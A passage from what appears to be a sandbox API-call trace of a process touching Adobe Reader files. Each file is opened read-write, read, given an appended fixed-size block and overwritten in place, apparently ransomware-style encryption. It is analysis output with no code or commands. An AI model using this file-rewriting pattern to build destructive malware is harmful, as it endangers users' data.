lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.CHS", lpUsedDefaultChar=0x0) returned 15 [0085.411] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.413] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1200 [0085.414] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.414] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x1200 [0085.414] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.415] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.415] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.415] CloseHandle (hObject=0x1f0) returned 1 [0085.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_CN\\updater.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_cn\\updater.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.416] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.416] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x1e00 [0085.416] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.416] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.417] ReleaseMutex (hMutex=0x168) returned 1 [0085.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CHS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.CHS", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.CHS", lpUsedDefaultChar=0x0) returned 11 [0085.417] ReadFile (in: hFile=0x1f0, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x2e9f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0085.419] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.419] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2e9f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0085.420] CloseHandle (hObject=0x1f0) returned 1 [0085.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\DigSig.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\digsig.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.421] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.421] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x11e00 [0085.422] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.422] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.422] ReleaseMutex (hMutex=0x168) returned 1 [0085.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CHT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0085.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CHT", cchWideChar=10, lpMultiByteStr=0x1f735ec, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.CHT", lpUsedDefaultChar=0x0) returned 10 [0085.422] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.774] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x10e00 [0085.774] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.775] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x10e00 [0085.776] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.777] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.777] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.777] CloseHandle (hObject=0x1f0) returned 1 [0085.777] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\PPKLITE.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\ppklite.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.778] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.778] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x4e000 [0085.779] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.779] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.779] ReleaseMutex (hMutex=0x168) returned 1 [0085.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.CHT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0085.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.CHT", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.CHT", lpUsedDefaultChar=0x0) returned 11 [0085.779] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.791] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4d000 [0085.791] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.792] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x4d000 [0085.793] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.794] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.794] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.794] CloseHandle (hObject=0x1f0) returned 1 [0085.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\zh_TW\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\zh_tw\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.796] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.796] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xe4 [0085.796] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.796] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.796] ReleaseMutex (hMutex=0x168) returned 1 [0085.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f735ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0085.796] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ee6688, nNumberOfBytesToRead=0xe4, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee6688*, lpNumberOfBytesRead=0x2e9f2bc*=0xe4, lpOverlapped=0x0) returned 1 [0085.798] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.798] WriteFile (in: hFile=0x1f0, lpBuffer=0x2692e08*, nNumberOfBytesToWrite=0x66c, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2692e08*, lpNumberOfBytesWritten=0x2e9f2d0*=0x66c, lpOverlapped=0x0) returned 1 [0085.798] CloseHandle (hObject=0x1f0) returned 1 [0085.799] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\DataMatrix.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\datamatrix.pmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.800] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.800] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x7f400 [0085.800] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.801] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.801] ReleaseMutex (hMutex=0x168) returned 1 [0085.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataMatrix.pmp", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0085.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DataMatrix.pmp", cchWideChar=14, lpMultiByteStr=0x1f7328c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DataMatrix.pmp", lpUsedDefaultChar=0x0) returned 14 [0085.801] ReadFile (in: hFile=0x1f0, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0085.803] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7e400 [0085.804] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.806] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7e400 [0085.807] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.807] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.807] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0085.808] CloseHandle (hObject=0x1f0) returned 1 [0085.808] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\eBook.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ebook.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.809] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.809] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd063 [0085.809] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.809] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.809] ReleaseMutex (hMutex=0x168) returned 1 [0085.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.api", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.api", cchWideChar=9, lpMultiByteStr=0x1f7358c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.api", lpUsedDefaultChar=0x0) returned 9 [0085.810] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea6888, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0085.816] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xc063 [0085.816] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.817] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0xc063 [0085.817] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.818] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0085.818] WriteFile (in: hFile=0x1f0, lpBuffer=0x1ea6888*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea6888*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0085.818] CloseHandle (hObject=0x1f0) returned 1 [0085.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.819] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.819] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0085.819] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.820] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.820] ReleaseMutex (hMutex=0x168) returned 1 [0085.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.DEU", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.DEU", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.DEU", lpUsedDefaultChar=0x0) returned 9 [0085.820] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0085.829] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0085.829] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0085.830] CloseHandle (hObject=0x1f0) returned 1 [0085.830] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0085.831] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.831] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0085.831] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0085.831] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.831] ReleaseMutex (hMutex=0x168) returned 1 [0085.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.NLD", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.832] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.NLD", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.NLD", lpUsedDefaultChar=0x0) returned 9 [0085.832] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0086.128] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0086.128] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0086.128] CloseHandle (hObject=0x1f0) returned 1 [0086.128] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0086.258] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 